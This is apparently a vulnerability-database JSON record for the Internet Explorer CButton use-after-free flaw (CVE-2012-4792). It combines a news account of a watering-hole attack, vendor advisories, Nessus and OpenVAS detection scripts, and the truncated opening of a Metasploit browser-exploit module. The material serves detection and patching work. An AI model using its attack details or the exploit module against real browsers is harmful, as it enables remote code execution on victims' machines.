\u201cIn addition to this commonality, there are many other symbols in common between the files.\u201d\n\nWatering hole attacks are carried out to monitor the victim\u2019s online activities. Attackers inject malicious files onto websites hoping to snare people with an interest in the site\u2019s focus. These types of attacks are not only effective, but are more economical than targeted attacks that start with a phishing email. Watering hole attacks require less advance legwork, yet are generally state-sponsored, intelligence-driven attacks.\n\nThe compromise of the CFR website, a foreign-policy resource for its notable public figure members and directors, brought the latest zero-day to light. The attack began as early as Dec. 7 and was still going on through the Christmas holiday. Attackers used a malicious Adobe Flash file called today.swf to launch a heap spray attack against IE, overrunning memory and enabling an attacker to remotely execute code on an infected computer. The Javascript hosting the exploit checks first to see if the Windows language is set to English, Chinese, Japanese, Korean or Russian before executing. It also uses cookies to ensure the attack is delivered only once.\n\nThe vulnerability, Microsoft said, occurs in the way IE accesses an object in memory that has been deleted or not properly allocated. Memory may be corrupted and allow an attacker to execute code with the user\u2019s privileges.\n\nResearchers at Avast Software yesterday reported infections on multiple sites worldwide. Researcher Jindrich Kubec said two of the sites were also hosting the binaries and configurations found in the September attacks Symantec tied to Elderwood. Those attacks were serving the PlugX and Poison Ivy RATs.\n", "modified": "2013-05-10T15:44:38", "published": "2013-01-04T18:34:39", "id": "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "href": "https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/77368/", "type": "threatpost", "title": "Researchers Bypass Microsoft Fix It for IE Zero Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-13T06:16:35", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Microsoft Internet Explorer versions 6, 7, and 8 are affected.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nVendor fixes are available. Please see the references for more information.\n", "modified": "2012-12-30T00:00:00", "published": "2012-12-30T00:00:00", "id": "SMNTC-57070", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/57070", "type": "symantec", "title": "Microsoft Internet Explorer 'CDwnBindInfo' Use-After-Free Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-03T12:15:39", "bulletinFamily": "scanner", "description": "The remote host is missing the workaround referenced in KB 2794220\n(Microsoft ", "modified": "2019-11-02T00:00:00", "id": "SMB_KB2794220.NASL", "href": "https://www.tenable.com/plugins/nessus/63372", "published": "2013-01-02T00:00:00", "title": "MS KB2794220: Vulnerability in Internet Explorer Could Allow Remote Code Execution (deprecated)", "type": "nessus", "sourceData": "#@DEPRECATED\n#\n# Disabled on 2013/01/14. Deprecated by smb_nt_ms13-008.nasl\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63372);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSKB\", value:\"2794220\");\n\n script_name(english:\"MS KB2794220: Vulnerability in Internet Explorer Could Allow Remote Code Execution (deprecated)\");\n script_summary(english:\"Checks if 'Fix it' 50971 is in use.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has a web browser installed that is affected by a\nremote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing the workaround referenced in KB 2794220\n(Microsoft 'Fix it' 50971). This workaround mitigates a use-after-free\nvulnerability in Internet Explorer. Without this workaround enabled, an\nattacker could exploit this vulnerability by tricking a user into\nviewing a maliciously crafted web page, resulting in arbitrary code\nexecution. This vulnerability is being actively exploited in the wild.\n\nNote that the Microsoft 'Fix it' solution is effective only if the latest\navailable version of 'mshtml.dll' is installed. \n\nThis plugin has been deprecated due to the publication of MS13-008. \nMicrosoft has released updates that make the workarounds unnecessary. \nTo check for those, use Nessus plugin ID 63522.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2794220\");\n script_set_attribute(attribute:\"solution\", value:\"Apply Microsoft 'Fix it' 50971.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/ProductName\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Use smb_nt_ms13-008.nasl (plugin ID 63522) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/WindowsVersion');\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1)\n audit(AUDIT_WIN_SERVER_CORE);\n\nie_ver = hotfix_check_ie_version();\nif (ie_ver !~ \"^[678]\\.\") audit(AUDIT_INST_VER_NOT_VULN, 'IE', ie_ver);\n\nport = kb_smb_transport();\nvuln = 0;\n\nregistry_init();\nhandle = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\nsystemroot = hotfix_get_systemroot();\nif(!systemroot) audit(AUDIT_FN_FAIL, 'hotfix_get_systemroot');\n\nguid = '{a1447a51-d8b1-4e93-bb19-82bd20da6fd2}';\npath = get_registry_value(handle:handle, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\\" + guid);\n\nif (isnull(path))\n path = systemroot + \"\\AppPatch\\Custom\\\" + guid + '.sdb';\n\nRegCloseKey(handle:handle);\nclose_registry(close:FALSE);\n\n# Now make sure the file is in place\nif (hotfix_file_exists(path:path))\n vuln = FALSE;\nelse\n vuln = TRUE;\n\nhotfix_check_fversion_end();\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus determined the Microsoft \\'Fix it\\' solution is not in use because' +\n '\\nthe following file was not found :\\n\\n' +\n path + '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:07", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.", "modified": "2019-05-21T00:00:00", "published": "2013-01-02T00:00:00", "id": "OPENVAS:1361412562310902699", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902699", "title": "Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902699\");\n script_version(\"2019-05-21T06:50:08+0000\");\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 06:50:08 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-01-02 10:52:56 +0530 (Wed, 02 Jan 2013)\");\n script_name(\"Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51695\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1027930\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/154201\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/80885\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2794220\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/security/advisory/2794220\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-au/security/bulletin/ms13-008\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could will remote attackers to gain sensitive\n information or execute arbitrary code in the context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x\");\n\n script_tag(name:\"insight\", value:\"Flaw exists due to the way that Internet Explorer accesses an object that has\n been deleted or has not been properly allocated and causing use-after-free error when handling the CDwnBindInfo object.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || ieVer !~ \"^[6-8]\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6325\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5098\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18746\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22994\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17184\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21392\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18020\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22184\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:11:25", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.", "modified": "2017-05-10T00:00:00", "published": "2013-01-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902699", "id": "OPENVAS:902699", "title": "Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms_ie_remote_code_exec_vuln.nasl 6093 2017-05-10 09:03:18Z teissa $\n#\n# Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could will remote attackers to gain sensitive\n information or execute arbitrary code in the context of the current user.\n Impact Level: System/Application\";\n\ntag_affected = \"Microsoft Internet Explorer version 6.x/7.x/8.x\";\ntag_insight = \"Flaw exists due to the way that Internet Explorer accesses an object that has\n been deleted or has not been properly allocated and causing use-after-free\n error when handling the CDwnBindInfo object.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms13-008\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS13-008.\";\n\nif(description)\n{\n script_id(902699);\n script_version(\"$Revision: 6093 $\");\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-10 11:03:18 +0200 (Wed, 10 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-02 10:52:56 +0530 (Wed, 02 Jan 2013)\");\n script_name(\"Microsoft Internet Explorer Remote Code Execution Vulnerability (2794220)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51695\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1027930\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/154201\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/80885\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2794220\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/advisory/2794220\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/en-au/security/bulletin/ms13-008\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_keys(\"MS/IE/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\nieVer = \"\";\ndllVer = NULL;\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## Get IE Version from KB\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || !(ieVer =~ \"^(6|7|8)\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\n## Get Version from Mshtml.dll\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6325\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5098\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18746\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22994\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17184\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21392\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18020\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22184\")){\n security_message(0);\n }\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "Use-after-free vulnerability in CButton is actively used in-the-wild.", "modified": "2013-01-16T00:00:00", "published": "2013-01-16T00:00:00", "id": "SECURITYVULNS:VULN:12835", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12835", "title": "Microsoft Internet Explorer use-after-free vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "description": "Added: 01/04/2013 \nCVE: [CVE-2012-4792](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) \nBID: [57070](<http://www.securityfocus.com/bid/57070>) \nOSVDB: [88774](<http://www.osvdb.org/88774>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nAll references to DOM button objects are not properly removed when a DOM buttom object is deleted. If the stale references are used, an attempt to access unallocated memory may occur. This results in a use-after-free vulnerability. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft Security Bulletin [MS13-008](<http://technet.microsoft.com/en-us/security/Bulletin/MS13-008>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx> \n<https://threatpost.com/en_us/blogs/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912> \n<http://technet.microsoft.com/en-us/security/advisory/2794220> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-01-04T00:00:00", "published": "2013-01-04T00:00:00", "id": "SAINT:2EF245955FDA0606FF9A743D9132C6A8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_cbutton_uaf", "title": "Internet Explorer CButton Use After Free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "description": "Added: 01/04/2013 \nCVE: [CVE-2012-4792](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) \nBID: [57070](<http://www.securityfocus.com/bid/57070>) \nOSVDB: [88774](<http://www.osvdb.org/88774>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nAll references to DOM button objects are not properly removed when a DOM buttom object is deleted. If the stale references are used, an attempt to access unallocated memory may occur. This results in a use-after-free vulnerability. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft Security Bulletin [MS13-008](<http://technet.microsoft.com/en-us/security/Bulletin/MS13-008>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx> \n<https://threatpost.com/en_us/blogs/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912> \n<http://technet.microsoft.com/en-us/security/advisory/2794220> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-01-04T00:00:00", "published": "2013-01-04T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_cbutton_uaf", "id": "SAINT:E4225C669F34358E2FC7EE71D604FA0A", "type": "saint", "title": "Internet Explorer CButton Use After Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "description": "Added: 01/04/2013 \nCVE: [CVE-2012-4792](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) \nBID: [57070](<http://www.securityfocus.com/bid/57070>) \nOSVDB: [88774](<http://www.osvdb.org/88774>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nAll references to DOM button objects are not properly removed when a DOM buttom object is deleted. If the stale references are used, an attempt to access unallocated memory may occur. This results in a use-after-free vulnerability. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft Security Bulletin [MS13-008](<http://technet.microsoft.com/en-us/security/Bulletin/MS13-008>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx> \n<https://threatpost.com/en_us/blogs/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912> \n<http://technet.microsoft.com/en-us/security/advisory/2794220> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-01-04T00:00:00", "published": "2013-01-04T00:00:00", "id": "SAINT:DCB95B394157102378C2A8CADFE280E8", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_cbutton_uaf", "type": "saint", "title": "Internet Explorer CButton Use After Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T21:48:26", "bulletinFamily": "exploit", "description": "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability. CVE-2012-4792. Remote exploit for windows platform", "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "id": "EDB-ID:23785", "href": "https://www.exploit-db.com/exploits/23785/", "type": "exploitdb", "title": "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::RopDb\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::IE,\r\n\t\t:ua_minver => \"8.0\",\r\n\t\t:ua_maxver => \"8.0\",\r\n\t\t:javascript => true,\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:rank => GoodRanking\r\n\t})\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in Microsoft Internet Explorer. 